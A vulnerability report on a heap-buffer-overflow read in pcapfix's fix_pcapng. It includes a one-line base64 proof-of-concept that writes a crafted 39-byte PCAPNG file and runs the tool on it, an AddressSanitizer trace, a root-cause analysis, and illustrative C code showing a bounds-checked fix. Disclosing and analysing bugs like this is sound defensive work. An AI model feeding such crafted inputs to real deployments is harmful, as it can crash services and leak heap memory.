With pcapfix built from commit
5c2965 with Clang 13 (+ASan) on Ubuntu 20.04.2 LTS, we discovered a PCAPNG file that triggers a heap-buffer-overflow (an out-of-bounds read) during a memcpy in fix_pcapng.
echo "Cg0NCgAAAADT1MOysvgUAAAAAEpaggAAoPWPsvgUAAAAAAAAAAAA" | base64 -d > /tmp/fuzz.pcap && ./pcapfix -s -v /tmp/fuzz.pcap
The above PoC produces the following output, including the AddressSanitizer stack trace:
[*] Reading from file: /tmp/fuzz.pcap
[*] Writing to file: fixed_fuzz.pcap
[*] File size: 39 bytes.
[+] This is a PCAPNG file.
[*] FOUND: Section Header Block at position 0 (0 bytes)
[-] Unknown Byte Order Magic: 0xb2c3d4d3 ==> CORRECTED.
[-] Major version number: 63666 ==> CORRECTED.
[-] Minor version number: 20 ==> CORRECTED.
[*] Section length: 143324300181504 ==> SETTING TO -1
[*] Block size adjusted (0 --> 28).
=================================================================
==2393459==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000051 at pc 0x0000004334b4 bp 0x7ffe43f9a430 sp 0x7ffe43f99bf0
READ of size 28 at 0x602000000051 thread T0
    #0 0x4334b3 in __interceptor_memcpy (/root/pcapfix/pcapfix+0x4334b3)
    #1 0x4dfb9d in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34:10
    #2 0x4dfb9d in fix_pcapng /root/pcapfix/pcapng.c:1361:7
    #3 0x4c9eec in main /root/pcapfix/pcapfix.c
    #4 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x41c58d in _start (/root/pcapfix/pcapfix+0x41c58d)

0x602000000051 is located 0 bytes to the right of 1-byte region [0x602000000050,0x602000000051)
allocated by thread T0 here:
    #0 0x497acd in __interceptor_malloc (/root/pcapfix/pcapfix+0x497acd)
    #1 0x4d829e in fix_pcapng /root/pcapfix/pcapng.c:210:17
    #2 0x4c9eec in main /root/pcapfix/pcapfix.c
    #3 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x4334b3) in __interceptor_memcpy
The trace shows the memcpy at pcapng.c:1361 reading 28 bytes (the block size after pcapfix adjusted it from 0 to 28) out of a 1-byte region allocated at pcapng.c:210, which suggests the copy length is taken from the corrected block size while the source buffer was sized from the original on-disk length. Because this is an over-read rather than a write, the direct consequences are a crash (abort under ASan, or a segfault if the read crosses into an unmapped page) and whatever adjacent heap contents get copied into the "fixed" output file; it does not by itself corrupt memory, though a file processed by an unsanitized build can still be left with leaked heap bytes in its section header.
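To make the mismatch concrete, here is an added example (not pcapfix's own code, and not taken from the report) that parses the 39-byte PoC above, applies the same corrections the pcapfix log prints, and then rebuilds the section header block without ever reading more than was actually allocated. The corrected values (byte-order magic 0x1a2b3c4d, version 1.0, section length -1) are the standard PCAPNG defaults and are assumed to be what pcapfix substitutes; the "section length larger than the file" rule used to decide the length is absurd is also an assumption. copy_block_unchecked is a hypothetical reconstruction of the pattern the ASan trace points at and is never called.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed input: the 39-byte PoC from the report, base64-decoded. */
static const uint8_t POC[39] = {
    0x0a, 0x0d, 0x0d, 0x0a,  0x00, 0x00, 0x00, 0x00,   /* block type, total length = 0 */
    0xd3, 0xd4, 0xc3, 0xb2,  0xb2, 0xf8,  0x14, 0x00,  /* magic, major 63666, minor 20 */
    0x00, 0x00, 0x00, 0x4a,  0x5a, 0x82, 0x00, 0x00,   /* section length 143324300181504 */
    0xa0, 0xf5, 0x8f, 0xb2,  0xf8, 0x14,               /* trailing junk */
    0, 0, 0, 0, 0, 0, 0, 0, 0
};

/* type + total_len + magic + major + minor + section_len + trailing total_len */
#define SHB_MIN_LEN 28u
#define SHB_TYPE    0x0a0d0d0au
#define SHB_MAGIC   0x1a2b3c4du

struct shb {
    uint32_t block_type, block_len, byte_order_magic;
    uint16_t major, minor;
    uint64_t section_len;
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | (uint64_t)rd32(p + 4) << 32; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void wr64(uint8_t *p, uint64_t v) { for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Parse the fixed fields of a Section Header Block read little-endian, as the log shows
 * pcapfix did for this file. Returns 0, or -1 if fewer than 24 bytes are available. */
int parse_shb(const uint8_t *buf, size_t n, struct shb *out)
{
    if (n < 24) return -1;
    out->block_type       = rd32(buf);
    out->block_len        = rd32(buf + 4);
    out->byte_order_magic = rd32(buf + 8);
    out->major            = rd16(buf + 12);
    out->minor            = rd16(buf + 14);
    out->section_len      = rd64(buf + 16);
    return 0;
}

/* Apply the corrections the pcapfix log prints for this file. Returns the number of fields changed.
 * Assumption: a section length that exceeds the file size is treated as unknown (-1). */
int fix_shb(struct shb *h, uint64_t file_size)
{
    int fixed = 0;
    if (h->byte_order_magic != SHB_MAGIC) { h->byte_order_magic = SHB_MAGIC; fixed++; }
    if (h->major != 1)                    { h->major = 1;                    fixed++; }
    if (h->minor != 0)                    { h->minor = 0;                    fixed++; }
    if (h->section_len != UINT64_MAX && h->section_len > file_size) { h->section_len = UINT64_MAX; fixed++; }
    if (h->block_len < SHB_MIN_LEN)       { h->block_len = SHB_MIN_LEN;      fixed++; }
    return fixed;
}

/* Hypothetical reconstruction of the vulnerable pattern: `src` was allocated from the on-disk
 * length (0, kept as a 1-byte region), but the copy uses the corrected length. Under ASan this is
 * exactly "READ of size 28" from a 1-byte region. Shown for comparison only; never called here. */
void copy_block_unchecked(uint8_t *dst, const uint8_t *src, uint32_t corrected_len)
{
    memcpy(dst, src, corrected_len);
}

/* Hardened form: allocate the corrected size, copy at most `avail` bytes from the source,
 * zero-fill the remainder, then write the corrected fields and trailing length. `*overread_avoided`
 * receives how many bytes an unchecked memcpy of h->block_len would have read past `avail`. */
uint8_t *rebuild_shb(const uint8_t *src, size_t avail, const struct shb *h, size_t *overread_avoided)
{
    uint32_t len = h->block_len;
    if (len < SHB_MIN_LEN) return NULL;          /* caller must run fix_shb first */
    uint8_t *dst = calloc(1, len);
    if (!dst) return NULL;
    size_t n = avail < len ? avail : len;        /* the allocation, not the header, bounds the copy */
    memcpy(dst, src, n);
    *overread_avoided = len - n;
    wr32(dst, SHB_TYPE);
    wr32(dst + 4, len);
    wr32(dst + 8, h->byte_order_magic);
    wr16(dst + 12, h->major);
    wr16(dst + 14, h->minor);
    wr64(dst + 16, h->section_len);
    wr32(dst + len - 4, len);                    /* trailing total length must equal the leading one */
    return dst;
}

int main(void)
{
    struct shb h;
    if (parse_shb(POC, sizeof POC, &h) != 0) return 1;
    printf("magic 0x%08x version %u.%u section_len %llu block_len %u\n", h.byte_order_magic,
           h.major, h.minor, (unsigned long long)h.section_len, h.block_len);
    int fixed = fix_shb(&h, sizeof POC);
    uint8_t one[1] = { POC[0] };                 /* mimic the 1-byte region from the trace */
    size_t over = 0;
    uint8_t *out = rebuild_shb(one, sizeof one, &h, &over);
    if (!out) return 1;
    printf("%d fields corrected; an unchecked memcpy would have read %zu bytes past the allocation\n",
           fixed, over);
    free(out);
    return 0;
}
```

The point of rebuild_shb is that the length used for memcpy is derived from what was allocated, never from a header value that was just rewritten; when the two disagree, the gap is zero-filled and reported instead of being read from whatever follows the allocation on the heap.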